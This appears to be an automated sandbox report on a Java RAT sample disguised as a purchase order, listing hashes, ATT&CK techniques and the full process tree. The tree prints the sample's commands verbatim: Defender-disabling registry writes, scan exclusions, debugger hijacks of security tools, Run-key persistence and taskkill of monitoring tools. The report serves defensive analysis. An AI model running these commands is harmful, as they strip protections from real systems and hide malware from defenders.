qarallax | 2b9e74db724cd836104a57ae1b4eff596ea093d65153734e3b7167e6923db3fd

Analysis

max time kernel
63s
max time network
133s
platform
windows7_x64
resource
win7
submitted
26-06-2020 15:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PO20200623.jar
Size

406KB
MD5

849ac004f76921b87bf21035f6b5e14b
SHA1

af1c66fde1026618b9db019a979e082d22b69b2d
SHA256

2b9e74db724cd836104a57ae1b4eff596ea093d65153734e3b7167e6923db3fd
SHA512

fbbb369c9140d8383d604beeffb23111242d9608b77f9a2686462d7d693b96b157ad1167faa8d7e16000d546fe3b9cd6f31a02edba5acf2c1465762110660f3e

Score

10^/10

qarallax evasion persistence trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
QarallaxRAT
Qarallax is a RAT developed by Quaverse and sold as RaaS (RAT as a Service).
trojan qarallax

Qarallax RAT support DLL 1 IoCs

resource	yara_rule
behavioral1/files/0x000300000001352a-7.dat	qarallax_dll

Disables Task Manager via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490
Sets file execution options in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Loads dropped DLL 1 IoCs

pid	Process
1124	java.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\ulXOkad = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\PXBiH\\qMaee.class\""	java.exe
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run\ulXOkad = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\PXBiH\\qMaee.class\""	java.exe

Drops desktop.ini file(s) 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\PXBiH\Desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\PXBiH\Desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\PXBiH\Desktop.ini	java.exe
File created	C:\Users\Admin\PXBiH\Desktop.ini	java.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\dYZFi	java.exe
File opened for modification	C:\Windows\System32\dYZFi	java.exe

Kills process with taskkill 19 IoCs

evasion

pid	Process
1532	taskkill.exe
1968	taskkill.exe
1064	taskkill.exe
1552	taskkill.exe
1880	taskkill.exe
1884	taskkill.exe
1796	taskkill.exe
1636	taskkill.exe
560	taskkill.exe
896	taskkill.exe
524	taskkill.exe
1936	taskkill.exe
704	taskkill.exe
1872	taskkill.exe
1792	taskkill.exe
656	taskkill.exe
1400	taskkill.exe
1556	taskkill.exe
1220	taskkill.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1640	powershell.exe
1640	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	796	WMIC.exe
Token: SeSecurityPrivilege	796	WMIC.exe
Token: SeTakeOwnershipPrivilege	796	WMIC.exe
Token: SeLoadDriverPrivilege	796	WMIC.exe
Token: SeSystemProfilePrivilege	796	WMIC.exe
Token: SeSystemtimePrivilege	796	WMIC.exe
Token: SeProfSingleProcessPrivilege	796	WMIC.exe
Token: SeIncBasePriorityPrivilege	796	WMIC.exe
Token: SeCreatePagefilePrivilege	796	WMIC.exe
Token: SeBackupPrivilege	796	WMIC.exe
Token: SeRestorePrivilege	796	WMIC.exe
Token: SeShutdownPrivilege	796	WMIC.exe
Token: SeDebugPrivilege	796	WMIC.exe
Token: SeSystemEnvironmentPrivilege	796	WMIC.exe
Token: SeRemoteShutdownPrivilege	796	WMIC.exe
Token: SeUndockPrivilege	796	WMIC.exe
Token: SeManageVolumePrivilege	796	WMIC.exe
Token: 33	796	WMIC.exe
Token: 34	796	WMIC.exe
Token: 35	796	WMIC.exe
Token: SeIncreaseQuotaPrivilege	796	WMIC.exe
Token: SeSecurityPrivilege	796	WMIC.exe
Token: SeTakeOwnershipPrivilege	796	WMIC.exe
Token: SeLoadDriverPrivilege	796	WMIC.exe
Token: SeSystemProfilePrivilege	796	WMIC.exe
Token: SeSystemtimePrivilege	796	WMIC.exe
Token: SeProfSingleProcessPrivilege	796	WMIC.exe
Token: SeIncBasePriorityPrivilege	796	WMIC.exe
Token: SeCreatePagefilePrivilege	796	WMIC.exe
Token: SeBackupPrivilege	796	WMIC.exe
Token: SeRestorePrivilege	796	WMIC.exe
Token: SeShutdownPrivilege	796	WMIC.exe
Token: SeDebugPrivilege	796	WMIC.exe
Token: SeSystemEnvironmentPrivilege	796	WMIC.exe
Token: SeRemoteShutdownPrivilege	796	WMIC.exe
Token: SeUndockPrivilege	796	WMIC.exe
Token: SeManageVolumePrivilege	796	WMIC.exe
Token: 33	796	WMIC.exe
Token: 34	796	WMIC.exe
Token: 35	796	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1100	WMIC.exe
Token: SeSecurityPrivilege	1100	WMIC.exe
Token: SeTakeOwnershipPrivilege	1100	WMIC.exe
Token: SeLoadDriverPrivilege	1100	WMIC.exe
Token: SeSystemProfilePrivilege	1100	WMIC.exe
Token: SeSystemtimePrivilege	1100	WMIC.exe
Token: SeProfSingleProcessPrivilege	1100	WMIC.exe
Token: SeIncBasePriorityPrivilege	1100	WMIC.exe
Token: SeCreatePagefilePrivilege	1100	WMIC.exe
Token: SeBackupPrivilege	1100	WMIC.exe
Token: SeRestorePrivilege	1100	WMIC.exe
Token: SeShutdownPrivilege	1100	WMIC.exe
Token: SeDebugPrivilege	1100	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1100	WMIC.exe
Token: SeRemoteShutdownPrivilege	1100	WMIC.exe
Token: SeUndockPrivilege	1100	WMIC.exe
Token: SeManageVolumePrivilege	1100	WMIC.exe
Token: 33	1100	WMIC.exe
Token: 34	1100	WMIC.exe
Token: 35	1100	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1100	WMIC.exe
Token: SeSecurityPrivilege	1100	WMIC.exe
Token: SeTakeOwnershipPrivilege	1100	WMIC.exe
Token: SeLoadDriverPrivilege	1100	WMIC.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1124	java.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1124 wrote to memory of 296	1124	java.exe	25
PID 1124 wrote to memory of 296	1124	java.exe	25
PID 1124 wrote to memory of 296	1124	java.exe	25
PID 1124 wrote to memory of 536	1124	java.exe	26
PID 1124 wrote to memory of 536	1124	java.exe	26
PID 1124 wrote to memory of 536	1124	java.exe	26
PID 536 wrote to memory of 796	536	cmd.exe	27
PID 536 wrote to memory of 796	536	cmd.exe	27
PID 536 wrote to memory of 796	536	cmd.exe	27
PID 1124 wrote to memory of 1656	1124	java.exe	28
PID 1124 wrote to memory of 1656	1124	java.exe	28
PID 1124 wrote to memory of 1656	1124	java.exe	28
PID 1656 wrote to memory of 1100	1656	cmd.exe	29
PID 1656 wrote to memory of 1100	1656	cmd.exe	29
PID 1656 wrote to memory of 1100	1656	cmd.exe	29
PID 1124 wrote to memory of 1688	1124	java.exe	30
PID 1124 wrote to memory of 1688	1124	java.exe	30
PID 1124 wrote to memory of 1688	1124	java.exe	30
PID 1124 wrote to memory of 1400	1124	java.exe	31
PID 1124 wrote to memory of 1400	1124	java.exe	31
PID 1124 wrote to memory of 1400	1124	java.exe	31
PID 1124 wrote to memory of 1804	1124	java.exe	32
PID 1124 wrote to memory of 1804	1124	java.exe	32
PID 1124 wrote to memory of 1804	1124	java.exe	32
PID 1124 wrote to memory of 1832	1124	java.exe	33
PID 1124 wrote to memory of 1832	1124	java.exe	33
PID 1124 wrote to memory of 1832	1124	java.exe	33
PID 1124 wrote to memory of 1844	1124	java.exe	34
PID 1124 wrote to memory of 1844	1124	java.exe	34
PID 1124 wrote to memory of 1844	1124	java.exe	34
PID 1124 wrote to memory of 1408	1124	java.exe	35
PID 1124 wrote to memory of 1408	1124	java.exe	35
PID 1124 wrote to memory of 1408	1124	java.exe	35
PID 1124 wrote to memory of 1220	1124	java.exe	36
PID 1124 wrote to memory of 1220	1124	java.exe	36
PID 1124 wrote to memory of 1220	1124	java.exe	36
PID 1124 wrote to memory of 1788	1124	java.exe	37
PID 1124 wrote to memory of 1788	1124	java.exe	37
PID 1124 wrote to memory of 1788	1124	java.exe	37
PID 1124 wrote to memory of 1612	1124	java.exe	38
PID 1124 wrote to memory of 1612	1124	java.exe	38
PID 1124 wrote to memory of 1612	1124	java.exe	38
PID 1124 wrote to memory of 1592	1124	java.exe	39
PID 1124 wrote to memory of 1592	1124	java.exe	39
PID 1124 wrote to memory of 1592	1124	java.exe	39
PID 1124 wrote to memory of 1640	1124	java.exe	40
PID 1124 wrote to memory of 1640	1124	java.exe	40
PID 1124 wrote to memory of 1640	1124	java.exe	40
PID 1124 wrote to memory of 1552	1124	java.exe	41
PID 1124 wrote to memory of 1552	1124	java.exe	41
PID 1124 wrote to memory of 1552	1124	java.exe	41
PID 1124 wrote to memory of 1556	1124	java.exe	42
PID 1124 wrote to memory of 1556	1124	java.exe	42
PID 1124 wrote to memory of 1556	1124	java.exe	42
PID 1612 wrote to memory of 1888	1612	cmd.exe	44
PID 1612 wrote to memory of 1888	1612	cmd.exe	44
PID 1612 wrote to memory of 1888	1612	cmd.exe	44
PID 1124 wrote to memory of 1916	1124	java.exe	45
PID 1124 wrote to memory of 1916	1124	java.exe	45
PID 1124 wrote to memory of 1916	1124	java.exe	45
PID 1124 wrote to memory of 1936	1124	java.exe	50
PID 1124 wrote to memory of 1936	1124	java.exe	50
PID 1124 wrote to memory of 1936	1124	java.exe	50
PID 1124 wrote to memory of 1000	1124	java.exe	51

Views/modifies file attributes 1 TTPs 8 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
1220	attrib.exe
1788	attrib.exe
1688	attrib.exe
1400	attrib.exe
1804	attrib.exe
1832	attrib.exe
1844	attrib.exe
1408	attrib.exe

C:\Windows\system32\java.exe
java -jar C:\Users\Admin\AppData\Local\Temp\PO20200623.jar
1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1124
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:296
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:536
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:796
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1656
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1100
- C:\Windows\system32\attrib.exe
  attrib +h C:\Users\Admin\Oracle
  2⤵
  - Views/modifies file attributes
  PID:1688
- C:\Windows\system32\attrib.exe
  attrib +h +r +s C:\Users\Admin\.ntusernt.ini
  2⤵
  - Views/modifies file attributes
  PID:1400
- C:\Windows\system32\attrib.exe
  attrib -s -r C:\Users\Admin\PXBiH\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:1804
- C:\Windows\system32\attrib.exe
  attrib +s +r C:\Users\Admin\PXBiH\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:1832
- C:\Windows\system32\attrib.exe
  attrib -s -r C:\Users\Admin\PXBiH
  2⤵
  - Views/modifies file attributes
  PID:1844
- C:\Windows\system32\attrib.exe
  attrib +s +r C:\Users\Admin\PXBiH
  2⤵
  - Views/modifies file attributes
  PID:1408
- C:\Windows\system32\attrib.exe
  attrib +h C:\Users\Admin\PXBiH
  2⤵
  - Views/modifies file attributes
  PID:1220
- C:\Windows\system32\attrib.exe
  attrib +h +s +r C:\Users\Admin\PXBiH\qMaee.class
  2⤵
  - Views/modifies file attributes
  PID:1788
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1612
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:1888
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:2020
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1592
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\PXBiH','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\PXBiH\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1640
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "UserAccountControlSettings.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1552
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f
  2⤵
  PID:1556
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1916
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;" /f
  2⤵
  PID:1936
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1000
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2032
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1564
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_SZ /d "-" /f
  2⤵
  PID:1072
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1516
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1524
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:1828
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:1632
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d "-" /f
  2⤵
  PID:656
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:688
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
  2⤵
  PID:568
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1224
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
  2⤵
  PID:1688
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1788
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "2" /f
  2⤵
  PID:1636
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "Taskmgr.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1872
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f
  2⤵
  PID:1488
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:596
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1888
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f
  2⤵
  PID:1508
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1704
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1792
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:560
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  PID:784
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1500
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  PID:1076
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  PID:572
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1072
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  PID:1492
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1344
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1088
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1520
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:596
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:656
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:560
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1880
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:288
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List
    3⤵
    PID:2008
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1400
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1884
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1556
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1796
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1636
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1532
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:896
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1968
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1936
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1064
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1220
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:704
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:524

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads